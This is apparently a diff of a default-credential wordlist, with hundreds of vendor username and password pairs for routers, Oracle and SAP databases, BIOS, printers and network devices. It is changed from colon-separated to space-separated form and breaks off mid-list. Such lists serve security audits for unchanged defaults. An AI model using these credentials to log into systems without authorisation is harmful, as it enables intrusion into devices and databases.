-WEBADM:password -iceman: -guru:*3noguru -FAX:FAX -anon:anon -:j256 -USER8:USER8 -root:honey -PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC -:589721 -postgres: -WINSABRE:WINSABRE -USERP:USERP -none:public -Admin:shs -SYS:MANAGER -IVPM2: -PORTAL30_SSO:PORTAL30_SSO -ALLIN1MAIL:ALLIN1MAIL -POST: -TEMP: -:xo11nE -admin:nms -SYSADM:SYSADM -BATCH1: -me:me -SUPERVISOR:NFI -PROMAIL: -SECDEMO:SECDEMO -ARAdmin:AR#Admin# -sadmin: -ORAREGSYS:ORAREGSYS -VMASSYS: -man: -FROSTY:SNOWMAN -LASER:LASER -tutor: -:?award -root:changethis -DISKCNT: -default:WLAN_AP -SYSERR: -WWW:WWW -VAX:VAX -none:none -:Cable-docsis -PROCAL: -SUPERVISOR:SYSTEM -FAXWORKS: -ibm:password -CTXSYS:UNKNOWN -LDAP_Anonymous:LdapPassword_1 -(any:3:chars):cascade -games: -User:1234 -:Zenith -setup/snmp:setup/nopasswd -DSGATEWAY:DSGATEWAY -AWARD_SW: -CSMIG:CSMIG -:year2000 -umountfsys:umountfsys -:BIGO -root:jstwo -VMS:VMS -dni: -bpel:bpel -viewuser:viewuser1 -admin:ISPMODE -TDISK: -politically:correct -user_analyst:demo -admin:conexant -guest:1234 -root:logapp -admin:ip3000 -RSCS: -COMPIERE:COMPIERE -OSP22:OSP22 -guest1:guest1 -FORSE:FORSE -:lesarotl -factory:factory -bubba:(unknown) -admin:ip20 -admin:ip21 -LASER: -QUSER:QUSER -:AWARD:SW -primeos:prime -admin:tr650 -poll:poll -:j262 -:xljlbj -glftpd:glftpd -:Advance -RMAN:RMAN -mountfs:mountfs -DIRECT: -:console -firstsite:firstsite -:SW_AWARD -IPFSERV: -:snake -Administrator:Gateway -TSUSER:TSUSER -BATCH2: -admin:123123 -:3098z -:cc -snmp:nopasswd -WebAdmin:WebBoard -IBMUSER:SYS1 -SMART: -voadmin:manager -BC4J:BC4J -core:phpreactor -OPERVAX:OPERVAX -Bobo:hello -:Congress -:central -WANGTEK:WANGTEK -disttech:etas -OWA:OWA -USER2:USER2 -jasperadmin:jasperadmin -FIELD:DIGITAL -root:uClinux -guest:guestgue -FAXUSER:FAXUSER -WINSABRE:SABRE -VMBSYSAD: -admin:ip400 -PVM: -ctb_admin:sap123 -:AMI.KEY -:AMI.KEZ - :ANYCOM -USER_TEMPLATE: -DEMO4: -:inuvik49 -QSRV:11111111 -qsrv:qsrv -superdba:admin -PORTAL30:PORTAL31 -PORTAL30:PORTAL30 -XPRT:XPRT -Crowd:password -User:19750407 -18364: -:zjaaadc -ilom-admin:ilom-admin -rdc123:rdc123 -sysopr:sysopr -tasman:tasmannet -SYSTEM:0RACLE8I -:Cisco:router -admin:store -:SER -blank:blank -ADMIN:PASSWORD -admin:IP:address -WEBREAD:WEBREAD -ODM:ODM -11111111:11111111 -prime:prime -AURORA$ORB$UNAUTHENTICATED:INVALID -ADAMS:WOOD -root:vertex25 -sys:bin -lp:lineprin -Craft:crftpw -www:www -postgres:dbpass -rfmngr:$rfmngr$ -sync:sync -WANGTEK: -:1988 -MAINT: -SYSTEST_CLIG:SYSTEST -user:user0000 -user_approver:demo -ilom-operator:ilom-operator -Nice-admin:nicecti -:HELGA-S -answer: -NETNONPRIV:NETNONPRIV -nuucp: -CIDS:CIDS -VASTEST: -primenet:primenet -redline:redline -:rw -spcl:0000 -admin:muze -MBMANAGER:MBMANAGER -webmaster: -APPLSYS:FND -:ro -WINDOWS_PASSTHRU:WINDOWS_PASSTHRU -USER4:USER4 -hqadmin:hqadmin -UOMNI_: -FIELD:TEST -sys:system -Admin:123qwe -VMUTIL: -POST:BASE -:dn_04rjc -uucpadm:uucpadm -halt: -FAXWORKS:FAXWORKS -admin:password1 -EXFSYS:EXFSYS -4Dgifts: -JMUSER:JMUSER -admin:imsa7.0 -SUPERVISOR:NETFRAME -CIS:CIS -UNITY_: -:ciscofw -HLW:HLW -admin:brocade1 -pwrchute:pwrchute -:setup -:Tiny -IDMSSE: -postgres:svcPASS83 -NSA:nsa -!root:!ishtar -admin:blank -root:NeXT -TELEDEMO:TELEDEMO -:AMIDECOD -recover:recover -TRAVEL:TRAVEL -lexar: -:efmukl -viewer: -LIBRARY: -admin:raritan -PO8:PO8 -root@localhost:root -NAMES:NAMES -secofr:secofr -PDMREMI: -:biostar -MGE:VESOFT -USER7:USER7 -OWA_PUBLIC:OWA_PUBLIC -questra:questra -builtin:builtin -SFCNTRL: -SAP*:6071992 -boss:boss -anonymous:password -:isolation -:Q54arwms -PLEX:PLEX -OLAPDBA:OLAPDBA -:g6PJ -OLAPSVR:INSTANCE -user_expert:demo -root:pixmet2003 -Bhosda:Lund -TEST: -qsvr:ibmcel -CMSBATCH:CMSBATCH -:ABCD -gropher: -:AM -administrator:admin -:condo -:Toshiba -:familymacintosh -TAHITI:TAHITI -NEWINGRES:NEWINGRES -:AMI?SW -:mMmM -man:man -VM3812: -root:powerapp -ibm:service -VIF_DEVELOPER:VIF_DEV_PWD -ADMIN:WELCOME -Admin:Barricade -joeuser:joeuser -system:isp -IPC: -HELPDESK:HELPDESK -wlpisystem:wlpisystem -TSAFVM: -prtgadmin:prtgadmin -SYSTEM:CHANGE_ON_INSTALL -:CONCAT -:t0ch88 -webmaster:webmaster -:djonet -ADMIN:changeme -Any: -:Compaq -UAMIS_: -theman:changeit -CISINFO:CISINFO -mobile:dottie -QS_CB:QS_CB -CDEMORID:CDEMORID -tech:nician -DEMO2: -administrator:none -SYS:MANAG3R -End:User:7936 -PORTAL30_PUBLIC:PORTAL30_PUBLIC -sysadmin:nortel -SYS:D_SYSTPW -SYSTEM:SYSPASS -Guest:blank -User:User -MDDEMO_CLERK:CLERK -FIELD:FIELD -Admin:SECRET123 -Guest:Guest -PHANTOM: -admin:amigosw1 -:xmux -write: -ADMINISTRATOR:SENTINEL -system:field -:ducati900ss -qsecofr:22222222 -:lkw:peter -:awkward -:TzqF -SYSTEST_CLIG:SYSTEST_CLIG -ODS:ODS -admin:axis2 -BLAKE:PAPER -TSDEV:TSDEV -PRODBM: -admin:letmein -:joh316 -dos:dos -login:0000 -APL2PP: -system:hdms -admin:phplist -god1:12345 -admin:novell -CICSUSER:CISSUS -22222222:22222222 -root:passw0rd -user_publisher:demo -OSE$HTTP$ADMIN:(random:password) -def:trade -SuperUser:kronites -QS_CBADM:QS_CBADM -SYSA:SYSA -:00000000 -STUDENT:STUDENT -Draytek:1234 -SMDR:SECONDARY -EREP: -VSEMAN: -:OOOOOOOO -primos_cs:prime -demo: -fwadmin:xceladmin -:j64 -MTS_USER:MTS_PASSWORD -:AWARD_SW -AQDEMO:AQDEMO -private:ReadWrite:access:secret -:GWrv -:MagiMFP -:SnuFG5 -IS_$hostname:IS_$hostname -HPSupport:badg3r5 -ORASSO:ORASSO -GATEWAY: -:t0ch20x -CVIEW: -SH:SH -:zeosx -XXSESS_MGRYY:X#1833 -:wodj -:FOOBAR -SYSMAN:SYSMAN -VMMAP: -admin:urchin -PORTAL30_DEMO:PORTAL30_DEMO -Ezsetup: -QS_CS:QS_CS -administrator:PlsChgMe! -CMSUSER: -:MCUrv -DEMO1: -admin:adminadmin -userNotUsed:userNotU -:AMI~ -root:ibm -ncadmin:ncadmin -TESTPILOT:TESTPILOT -:Polrty -fg_sysadmin:password -UETP:UETP -QS:QS -DBI:MUMBLEFRATZ - :ILMI -SYSTEM:SYS -JWARD:AIROPLANE -APPS_MRC:APPS_MRC -:uboot -Moe:hello -SENTINEL:SENTINEL -admin:netgear1 -Yak:asd123 -PDP11:PDP11 -:aammii -Flo:hello -SLIDE:SLIDEPW -root:bagabu -primeos:primeos -:Spacve -:256256 -INFO:INFO -checkfsys:checkfsys -PRODCICS:PRODCICS -:foolproof -:AWARD_PW -MXAGENT:MXAGENT -SYSTEM:ORACLE8I -admin:no:password -VMTLIBR: -POWERCARTUSER:POWERCARTUSER -VMBACKUP: -CPNUC: -:QDI -:shiva -distrib:distrib0 -SUPERVISOR:SUPERVISOR -SYSMAINT:SERVICE -MIGRATE:MIGRATE -CDEMOUCB:CDEMOUCB -system:prime -QSRV:22222222 -:c -OLTSEP: -sysbin:sysbin -signa:signa -autocad:autocad -:SWITCHES_SW -WEBDB:WEBDB -daemon: -:aPAf -ncrm:ncrm -SAMPLE:SAMPLE -:1 -HCPARK:HCPARK -ALLINONE:ALLINONE -nm2user:nm2user -SAVSYS: -IIPS: -PATROL:PATROL -:technolgi -:MBIU0 -mailadmin:secret -adm:adm -TMSADM: -tutor:tutor -ESubscriber: -CHEY_ARCHSVR:CHEY_ARCHSVR -write:synnet -software:software -admin:welcome -god2:12345 -bbs:bbs -:Dell -disttech:disttech -FSFTASK2: -:zbaaaca -:prost -ORDSYS:ORDSYS -Administrator:administrator -:1234567890 -gopher:gopher -PSFMAINT: -SYSTEM:MANAG3R -:RM -:s!a@m#n$p%c -EAdmin: -12345:12345 -DECNET:DECNET -OPERATIONS:OPERATIONS -$system: -REP_OWNER:DEMO -PANAMA:PANAMA -LIBRARIAN:SHELVES -SYSTEM:0RACLE -fal: -4Dgifts:4Dgifts -:biosstar -NETSERVER:NETSERVER -:tiny -root:TANDBERG -POWERCHUTE:APC -USER5:USER5 -GPFD:GPFD -:12345678 -blank:admin -QS_OS:QS_OS -sysadm:admin -REPADMIN:REPADMIN -Administrator:12345678 -0:0 -DEMO8:DEMO8 -DEMO9:DEMO9 -CDEMO82:CDEMO82 -admin:boca:raton -Administrator:vision2 -administrator:0 -umountsys:umountsys -snmp:snmp -Username:PASSWORD -volition: -USER0:USER0 -CDEMOCOR:CDEMOCOR -SYSTEST:UETP -Rodopi:Rodopi -DECNET:NONPRIV -user_checker:demo -:tatercounter2000 -qserv:qserv -:ESSEX:or:IPC -AQ:AQ -support: -SAPR3:SAP -VRR1:VRR1 -fastwire:fw -admi:admin -FINANCE:FINANCE -WinCCAdmin:2WSXcder -ESTOREUSER:ESTORE -fax:fax -VIRUSER:VIRUSER -LINK:LINK -APPLSYSPUB:FNDPUB -:BIOS -SYS:ORACLE8 -SYS:ORACLE9 -overseer:overseer -checksys:checksys -umountfs:umountfs -DBDCCICS:DBDCCIC -Admin:password -:x6zynd56 -TOAD:TOAD -root:mozart -ntpupdate:ntpupdate -root:router -MDDEMO_MGR:MGR -ARCHIVIST: -SUPERVISOR:HARRIS -:11111 -billy-bob: -lp:bin -DECMAIL:DECMAIL -alien:alien -admin:dnnadmin -nsroot:nsroot -AdvWebadmin:advcomm500349 -dvstation:dvst10n -SERVICECONSUMER1:SERVICECONSUMER1 -MMO2:MMO2 -qsecofr:11111111 -NOC:NOC -WWWUSER:WWWUSER -root::Serial:port:only: -SAP:SAPR3 -root:t0talc0ntr0l4! -NEVIEW: -MAIL: -ODSCOMMON:ODSCOMMON -fal:fal -pixadmin:pixadmin -ripeop: -PENG: -:BIOSPASS -netlink:netlink -L2LDEMO:L2LDEMO -OUTLN:OUTLN -12.x: -scott:tiger:or:tigger -:toshy99 -dbase:dbase -:nz0u4bbe -fam:fam -:bell9 -Oper:Oper -RMAIL:RMAIL -administrator:19750407 -FND:FND -admin:exinda -PRIV:PRIV -admin:barney -SETUP: -:biodata -:24Banc81 -news:news -VSEIPO: -:j09F -pw:pw -GUEST: -ilon:ilon -:award_? -SYS:0RACLE39 -SYS:0RACLE38 -DEFAULT:DEFAULT -:AMI!SW -PLSQL:SUPERSECRET -root:alpine -politcally:correct -18140815:18140815 -APPUSER:APPUSER -SUPERVISOR: -CENTRA:CENTRA -LBACSYS:LBACSYS -:alfarome -PDP8:PDP8 -SFCMI: -administrator:*:*:# -lpadm:lpadm -Test:Everything: -bewan:bewan -:2580 -DIP:DIP -:Sxyz -mfd:mfd -MDDEMO:MDDEMO -:intermec -:589589 -SWPRO:SWPRO -DES:DES -root:fibranne -Coco:hello -GCS: -rodopi:rodopi -:touchpwd= -Scott:Tiger -Admin5:4tugboat -admin:funkwerk -ANDY:SWORDFISH -DESQUETOP: -nobody: -Manager:657 -:mysweex -SYSTEM:SYSLIB -NETCON:NETCON -JONES:STEEL -author:author -MOESERV: -web:web -tech:User -PUBSUB1:PUBSUB1 -SYS:D_SYSPW -CATALOG:CATALOG -:IBM -:Guest -SQLUSER: -RE:RE -REPORTS_USER:OEM_TEMP -MFG:MFG -POST:POST -HPLASER:HPLASER -HR:HR -VIDEOUSER:VIDEO:USER -DBA:SQL -:CMOSPWD -guest1:guest -superuser:asante -SYSTEM:0RACLE38 -SYSTEM:0RACLE39 -AUTOLOG1: -dadmin:dadmin -AURORA$JIS$UTILITY$: -wlcsystem:wlcsystem -news: -CPRM: +admin admin + +admin + admin +admin password +admin 1234 +root +Administrator admin +admin epicrouter +sysadm sysadm + 1234 + password + access +root root +tech tech + smcadmin + 0 +Administrator +root pass + system +root admin + PASSWORD + Symbol +operator +guest guest +admin bintec +security security +guest +debug synnet +manager manager + adtran +admin motorola +service smile + cascade +admin 0 +!root +user password + BRIDGE +netman netman +super super +admin switch +admin setup +admin changeme +diag switch +operator operator +user user +user +Cisco Cisco +Manager Manager +DTA TJM +apc apc +tech + cisco +User +root 1234 +Admin + letmein +cablecom router +adm +wradmin trancell + ascend +manager friend + NetICs +root blender +netscreen netscreen + sysadm + SKY_FOX +sa + public + Master +setup setup +root default + laflaf +cmaker cmaker +enable +MICRO RSX +login admin + Posterie +write private +root attack +monitor monitor + private + xdfk9874t3 +netopia netopia + Col2ogro2 +admin microbusiness +op op +adminview OCS +op operator +admin secure +admin atlantis +sysadmin sysadmin +super 5777364 +echo echo +craft +adm cascade +admin default +maint maint +comcast 1234 +CSG SESAME +diag danger +readonly lucenttech2 +admin operator +Manager +debug d.e.b.u.g +admin hello + SYSTEM +root ascend +root calvin +manuf xxyyzz +cusadmin highspeed +admin 123 +smc smcadmin +admin Sharp +root password +sweex mysweex +disttech 4tas +su super +admin system +root changeme +poll tech +sysadmin password +SYSDBA masterkey +anonymous + 0000 +root permit +admin barricade +support support +root tslinux +admin hp.com +recovery recovery +USERID PASSW0RD +eng engineer +administrator administrator +admin pwp +admin isee +NETWORK NETWORK +JDE JDE +admin superuser +Guest + Super +admin admin123 +super surt +rwa rwa +admin 123456 +admin NetCache + ADTRAN +USER USER +test test +admin extendnet +admin ironport +lp lp + Cisco +administrator +admin 1111 +sysadmin PASS +ro ro +admin Ascend + _Cisco +MAIL MAIL +ami + sitecom +hsa hsadb +system password +MGR CAROLIAN +ADMINISTRATOR ADMINISTRATOR +admin sysAdmin +root tini +admin smcadmin + Helpdesk +FIELD SERVICE +PBX PBX +netman +HELLO FIELD.SUPPORT +system sys +hscroot abc123 +1502 1502 + star +superuser admin +HELLO MGR.SYS +sysadm anicust +Administrator Administrator +netrangr attack + Intel + 12345 +readwrite lucenttech1 + secret +piranha piranha +wlse wlsedb +admin cisco +l3 l3 +admin diamond +none admin +naadmin naadmin +public public +admin 1988 +admin radius +admin root +NETOP +Administrator letmein +HELLO MANAGER.SYS + raidzone + 3ascotel +MANAGER HPOFFICE +demo demo + 166816 +User Password +admin zoomadsl +D-Link D-Link +user public +user pass +l2 l2 +MGR CCC +rw rw +cgadmin cgadmin +storwatch specialist + secure +vcr NetVCR +OPERATOR COGNOS +piranha q +admin synnet +MDaemon MServer +root cms500 +root davox +jagadmin +enquiry enquirypw +at4400 at4400 +support h179350 +davox davox +admin asd +PFCUser 240653C9467E45 +setup changeme +superuser superuser + atc123 +aaa +root admin_1 + 266344 +MGR WORD +topicalt password +admin2 changeme +1234 1234 +MANAGER ITF3000 + connect +FIELD HPONLY +nms nmspw +client client +admin comcomcom + speedxess +MGR ROBELLE + epicrouter +sys uplink +OPERATOR SYSTEM +field support +MGR SYS +root letacla + FORCE +deskman changeme +MAIL REMOTE +SYSADM sysadm +superadmin secret + backdoor +pmd +MGR CNAS +admin 22222 +GEN2 gen2 + medion +ADMN admn +Factory 56789 +PRODDTA PRODDTA +tellabs tellabs#1 +spcl 0 +dadmin dadmin01 + comcomcom +administrator password +helpdesk OCS +dhs3mt dhs3mt +MGR SECURITY +setup changeme! +install llatsni +adfexc adfexc +IntraSwitch Asante +manage !manage +superman 21241036 +MANAGER TELESUP +craft crftpw +login 0 + help +MGR HPOFFICE + lantronix +SPOOLMAN HPOFFICE +manager admin + netadmin +ADVMAIL HP +FIELD SUPPORT +MANAGER SYS +MGR VESOFT +vt100 public +PSEAdmin $secure$ +HELLO OP.OPERATOR +Manager friend + hs7mwxkk +patrol patrol + SUPER + SMDR + 1064 +teacher password +PCUSER SYS +MGR ITF3000 +Any 12345 +OPERATOR DISC +RSBCMON SYS +cellit cellit +MGR INTX3 +inads inads +halt tlah +root wyse +locate locatepw +admin visual +TMAR#HWMT8007079 +rapport r@p8p0r+ +MGR TELESUP +xbox xbox + TENmanUFactOryPOWER +device device +NICONEX NICONEX +admin admin1234 +root fivranne +acc acc +31994 31994 +admin netadmin +bcim bcimpw +websecadm changeme +blue bluepw +topicnorm password +supervisor PlsChgMe + R1QTPS +MGR HPONLY +ccrusr ccrusr +root Cisco +login password +266344 266344 +MAIL MPE +telecom telecom +MAIL HPOFFICE +GEN1 gen1 +Administrator smcadmin +SSA SSA + snmp-Trap +HTTP HTTP + default +mtch mtch +admin adslolitec +Administrator ganteng +bciim bciimpw +browse browsepw +Admin Admin + Password +hydrasna +sys change_on_install +deskres password +bbsd-client changeme2 +anonymous Exabyte +admin rmnetlm +replicator replicator +intel intel +OPERATOR SUPPORT +MGR HPP196 +radware radware +intermec intermec +mlusr mlusr +MGR RJE +FIELD LOTUS +init initpw +e250 e250changeme +MAIL TELESUP +Polycom SpIp +temp1 password + adminttd +tech field +support supportpw +mac + MiniAP +MANAGER SECURITY +3comcso RIP000 +RMUser1 password +WP HPOFFICE +Administrator changeme +MGR XLSERVER +MGR HPP187 +MGR HPP189 +inads indspw +admin linga +craft craft + enter +NAU NAU +rcust rcustpw +admin AitbISP4eCiG +mtcl mtcl +MGR CONV +topicres password +bcnas bcnaspw +MGR NETBASE +admin access +public +adminuser OCS +MGR REGO +Root +cac_admin cacadmin +mediator mediator +superman talent +Anonymous +kermit kermit +admin x-admin +MGR HPDESK + 9999 +root ROOT500 +admin my_DEMARC +volition volition +GlobalAdmin GlobalAdmin + 4getme2 +LUCENT01 UI-PSWD-01 +admin 2222 +LUCENT02 UI-PSWD-02 +MANAGER TCH +adminstat OCS +desknorm password +IntraStack Asante +OPERATOR SYS +MGR COGNOS + Fireport + ILMI +maint maintpw +supervisor supervisor +e500 e500changeme +admin mu +MANAGER COGNOS +deskalt password +admin OCS +bbsd-client NULL +cust custpw +admin noway +tiara tiaranet +bcms bcmspw + TANDBERG +m1122 m1122 +telco telco +superuser +xd xd +dhs3pms dhs3pms +VNC winterm +craft craftpw +maint rwmaint +anonymous any@ +login access +browse looker +customer none +cisco cisco +adminstrator changeme +FIELD MANAGER + 1234admin +FIELD MGR +ftp_nmc tuxalize +me +iclock timely +echo User +ADVMAIL HPOFFICE DATA +login 1111 +login 8429 +Administrator manage + Babylon +admin hagpolm1 +root 12345 +scmadmin scmchangeme +user tivonpw +sysadm Admin +Administrator password +admin administrator +installer installer +webadmin webadmin +ftp_inst pbxk1064 +DDIC 19920706 + pento +admin NetSurvibox +SYSTEM D_SYSTPW +draytek 1234 + 3477 +operator $chwarzepumpe +administrator asecret +EARLYWATCH SUPPORT + 10023 +Manager Admin +super.super +ftp_oper help1954 +corecess corecess +superuser 123456 +admin Password +super.super master +admin Protector +SYSTEM MANAGER +webadmin 1234 +install secret +FIELD HPWORD PUB +admin 12345 +admin symbol +weblogic weblogic +Admin 1988 +system/manager sys/change_on_install +root 3ep5w2u + 8111 + jannie +End User 123 +none 0 +d.e.b.u.g User +admin tomcat +target password +Administrator pilou +MD110 help +Administrator 3ware + ANYCOM +tiger tiger123 +adminttd adminttd +admin asante +admin smallbusiness +admin netscreen +FIELD HPP187 SYS +guest User +maint ntacdmax +admin w2402 +wlseuser wlsepassword +SAPCPIC admin +ftp_admi kilo1987 +admin articon +mtcl +default.password +admin michelangelo +manager changeme +root Mau'dib + Serial Num +root ggdaseuaimhrke +7 maintain +2 syslib +ADMIN admin +system weblogic +Administrator ggdaseuaimhrke +ADMIN +itsadmin init +PUBSUB PUBSUB +admin demo +system manager +sys sys +CTXSYS CTXSYS +ftp +bill bill +192.168.1.1 60020 @dsl_xilno +FIELD +admin dmr99 +setpriv system +GUEST GUEST +SAP* 06071992 +operator 1234 +t3admin Trintech +hello hello +supervisor +CISCO15 otbu+1 +1.79 Multi + babbit +mso w0rkplac3rul3s +Telecom Telecom +qsysopr qsysopr +admin TANDBERG +admin imss7.0 + nokia +APPS APPS +Developer isdev +mail mail +admin draadloos +qsecofr qsecofr +11111 x-admin + default.password +Service 5678 +enable cisco +netadmin nimdaten +Polycom 456 +admin P@55w0rd! +admin 1234admin +root par0t +any system +db2fenc1 db2fenc1 +johnson control +2 maintain +isp isp +demos +QSRV QSRV +root iDirect +MDSYS MDSYS +Admin 123456 +2 manager +vpasp vpasp +TEST TEST + Telecom +QSECOFR QSECOFR +adm none + 2501 +1 syslib +system security +admin leviton +!root blank +informix informix +root mpegvideo +5 games +root 0P3N +engmode hawk201 +scout scout +qpgmr qpgmr +admin admin000 +ADSL expert03 +cisco +images images +admin security +admin surecom +Gearguy Geardog + symantec +comcast +admin adslroot +1 manager +Demo + xyzzy +Administrator adaptec +system system +SAP* PASS +serial# serial# +BACKUP BACKUP +stratacom stratauser +root rootme +6.x +root !root +webadmin webibm + riverhead +mary password +COMPANY COMPANY +SYS SYS +DSL DSL +Jetform +none amber +eagle eagle +ROUTER +root brightmail +admin pass + HEWITT RAND +ods ods +siteadmin toplayer +admin OkiLAN +root rootpass +Alphanetworks wrgg15_di524 + x40rocks + nokai +Admin1 Admin1 +field field +Admin admin +Admin ImageFolio + iolan + manager +admin pfsense +janta sales janta211 +servlet manager +username password +citel password +Replicator iscopy +SYSMAN OEM_TEMP +1 operator +SYSTEM SYSTEM +administrator RSAAppliance +master themaster01 +Admin 1234 +2 operator +SUPERUSER ANS#150 +admin passwort +cn=orcladmin welcome +30 games +maintainer admin +setup + hello +admin NetSeq +BRIO_ADMIN BRIO_ADMIN + citel +internal oracle +CQSCHEMAUSER PASSWORD +root kn1TG7psLu +SYS SYSPASS + lkwpeter +DEV2000_DEMOS DEV2000_DEMOS +FSFTASK1 +checkfs checkfs +BACKUP +USER1 USER1 +root TENmanUFactOryPOWER +SQLDBA +root resumix +HELP HELP +toor logapp +SYS 0RACLE9 +SYS 0RACLE8 + 57gbzb +!root none +qsrvbas qsrvbas +SYSADMIN +EZsetup +Administrator 1234 + sldkj754 +BATCH +STRAT_USER STRAT_PASSWD +Administrator 19750407 + User +user USERP +primenet primeos +OEMREP OEMREP +admin [^_^] +USER6 USER6 +lynx + TTPTHA +powerdown powerdown +root Mau’dib +SYSTEM ORACL3 +$ALOC$ +password +VOL-0215 +admin nimda +tomcat tomcat +REP_MANAGER DEMO +WinCCConnect 2WSXcder +ALLIN1 ALLIN1 +DIRMAINT +eqadmin Serial port only equalizer +sysadm sysadmpw +QSRVBAS QSRVBAS +admin ip305Beheer +debug tech + ACCORD +AQJAVA AQJAVA +LASERWRITER LASERWRITER +Administrator 0000 +root nsi +PERFSTAT PERFSTAT +apcuser apc +MBWATCH MBWATCH + protection +system_admin +unix unix +OWNER OWNER +NETPRIV NETPRIV +VSEMAINT + AWARD?SW +DEMO DEMO +tomcat changethis +SYMPA SYMPA +REP_OWNER REP_OWNER +DCL DCL +FAX +root dbps +ARCHIVIST ARCHIVIST +USER PASSWORD +VTAMUSER +LASERWRITER +VMTAPE +basisk basisk +NetLinx password +OutOfBox demos guest 4DGifts (none by default) +none letmein +NETMGR NETMGR +DEFAULT USER +OAS_PUBLIC OAS_PUBLIC +read +AP AP +demos demos +SYSTEM Admin +admin j5Brn9 +MTSSYS MTSSYS +SYSMAINT DIGITAL +AUDIOUSER AUDIOUSER +Joe hello +IDMS + teX1 +admin allot +$SRV $SRV +snake +SYS 0RACLE +ADVMAIL +Administrator nicecti +ROOT ROOT +PRINTER PRINTER +shutdown +satan + m1link +RDM470 +master access + l2 + l1 +trouble trouble +fax +OP1 +admin@example.com admin +root trendimsa1.0 +HOST HOST +ADLDEMO ADLDEMO +QS_ADM QS_ADM +bin sys + AMI +OPER OPER +oracle +jj +PO7 PO7 +SYSTEM 0RACLE8 +SYSTEM 0RACLE9 +www +joe password + komprie + 123 +MAINT MAINT +CMSBATCH +root toor +CCC +role1 tomcat +DATAMOVE +lp + AMISETUP + sp99dd +halt halt +MSHOME MSHOME +ISPVM +crowd­-openid-­server password +user_editor demo +sedacm secacm +ROOT +Admin 3Com +db2admin db2admin +Airaya Airaya +supervisor visor +none Wireless +SYSDUMP1 +IMEDIA IMEDIA + Biostar +install install +primos_cs primos +admin infrant1 +Administrator Partner + Administrative +USER_TEMPLATE USER_TEMPLATE +pnadmin pnadmin + h6BB +lpadmin lpadmin +guest none +VTAM VTAM +TRACESVR TRACE +POSTMASTER POSTMASTER +MAILER MAILER +RSCSV2 +QS_WS QS_WS + sma +system_admin system_admin +circ +Demo password + rwa +nobody nobody +Tasman Tasmannet +admin !admin +DISCOVERER_ADMIN DISCOVERER_ADMIN +VMASMON +LR-ISDN LR-ISDN +TURBINE TURBINE +GL GL +PO PO + AMI_SW +super superpass +PRINT +MODTEST YES +GATEWAY GATEWAY +root system +PRIMARY PRIMARY +both tomcat + award.sw +haasadm lucy99 +pw pwpw +games games +DOCSIS_APP 3Com +bbs +EMP EMP +Admin cclfb +postmaster +SITEMINDER SITEMINDER +Any Any +vgnadmin vgnadmin +RJE RJE +gonzo +NEWS NEWS +sa Ektron + Award +AQUSER AQUSER +UTLBSTATU UTLESTAT + AMIAMI +netbotz netbotz +CTXSYS CHANGE_ON_INSTALL +xmi_demo sap123 + Crystal + Daewuu +ftp ftp +ORACACHE (random password) +MCUser MCUser1 +prash hello +sync +sysadm admpw +root rootadmin +PM PM +AP2SVP +master master +ibm 2222 +ULTIMATE ULTIMATE +SABRE +role1 role1 +user_pricer demo +admin enhydra +SUPERVISOR NF +EVENT EVENT + xyzall + rainbow +ADMIN JETSPEED +SYS ORACL3 +PORTAL30_SSO_PS PORTAL30_SSO_PS +FSFADMIN +OO OO +WKSYS WKSYS +OPERATNS OPERATNS + ksdjfg934t +UVPIM_ + merlin +OE OE +Any Local User Local User password +OCITEST OCITEST +web + HLT +ADMINISTRATOR admin +ESSEX + last +CTXSYS +None xyzzy +CTXDEMO CTXDEMO +user_designer demo + Admin + zebra +QDBA QDBA +role changethis +LRISDN LRISDN +tele tele +WEBCAL01 WEBCAL01 +rsadmin rsadmin +OMWB_EMULATION ORACLE +root alien +WINDOWS_PASSTHRU + sanfran +public ReadOnly access secret + AMIPSWD +MOREAU MOREAU +fast abd234 +root QNX +host dnnhost +administrator root +admin public +SYSTEM ORACLE + sertafu +ORDPLUGINS ORDPLUGINS +SYSWRM +mail + telos +ADMIN ADMIN +administrator adminpass +savelogs crash + ACCESS +SDOS_ICSAP SDOS_ICSAP +system adminpwd +BATCH BATCH +GUEST GUESTGUEST +SYSMAINT SYSMAINT +postmaster postmast +DSSYS DSSYS + award_ps + ZAAADA +MGWUSER MGWUSER + NTCIP +OPERATOR + hewlpack +TDOS_ICSAP TDOS_ICSAP +ssp ssp +EJSADMIN EJSADMIN + damin +INGRES INGRES +DS + A.M.I +estheralastruey + 1322222 +VCSRV VCSRV +Administrator storageserver +ssladmin ssladmin +CLARK CLOTH +shutdown shutdown +administrator 1234 +OEMADM OEMADM +restoreonly restoreonly1 +quser quser +PRINTER +MILLER MILLER +trmcnfg trmcnfg +REPORT REPORT +user_author demo + aLLy +dpn changeme +tour tour +mountfsys mountfsys +http +PROG PROG + iwill +openfiler password + Public +admin mp3mystic +RAID hpt +read synnet +admin peribit +STARTER STARTER +FAXUSER +GUEST GUESTGUE +DSA + guardone +daemon daemon +mountsys mountsys +SYSTEM ORACLE9 +SYSTEM ORACLE8 + gandalf +backuponly backuponly1 +IVPM1 + leaves +sysadm syspw +root blablabla + Compleri +USER3 USER3 +OPENSPIRIT OPENSPIRIT + spooml + changeit + wg +prime primeos +HPLASER + Vextrex +CSPUSER +qsvr qsvr +lynx lynx +SYSCKP +root letmein +Sysop Sysop +user_marketer demo +IMAGEUSER IMAGEUSER +root Password +bsxuser bsxpass +MASTER PASSWORD +USER9 USER9 +root ax400 +OLAPSYS MANAGER +SYSTEM OPERATOR +oracle oracle +root Mau?dib + MASTER +root t00lk1t +rsadmin + Daytec +OutOfBox + SZYX + cmaker + CTX_123 +rje rje +ODM_MTR MTRPW +QS_ES QS_ES +lansweeperuser mysecretpassword0* +DEMO3 +Username password +GPLD GPLD +uucp uucp +DBSNMP DBSNMP +VMARCH +GUEST TSEUG +SWUSER SWUSER +root 8RttoTriz +VTAM +OPERATNS +Operator Operator +CHEY_ARCHSVR +SYS ORACLE +roo honey +n.a guardone +accounting accounting +backuprestore backuprestore1 +PRINT PRINT + j322 + Craftr4 +dni dni +WEBADM password +iceman +guru *3noguru +FAX FAX +anon anon + j256 +USER8 USER8 +root honey +PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC + 589721 +postgres +WINSABRE WINSABRE +USERP USERP +none public +Admin shs +SYS MANAGER +IVPM2 +PORTAL30_SSO PORTAL30_SSO +ALLIN1MAIL ALLIN1MAIL +POST +TEMP + xo11nE +admin nms +SYSADM SYSADM +BATCH1 +me me +SUPERVISOR NFI +PROMAIL +SECDEMO SECDEMO +ARAdmin AR#Admin# +sadmin +ORAREGSYS ORAREGSYS +VMASSYS +man +FROSTY SNOWMAN +LASER 